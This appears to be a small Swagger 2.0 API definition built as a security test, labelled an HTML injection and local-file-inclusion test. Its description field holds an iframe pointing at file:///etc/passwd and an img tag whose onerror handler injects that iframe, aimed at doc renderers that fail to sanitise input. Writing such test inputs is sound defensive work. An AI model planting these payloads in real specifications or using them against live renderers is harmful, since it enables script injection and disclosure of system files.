swagger: '2.0'
info:
  version: 1.0.0
  title: HTML Injection IMG injected
  description: '
        <h1>Iframe Test By Raman MG : LFI Test </h1>
        <iframe src=file:///etc/passwd></iframe>
        <img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
    '
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
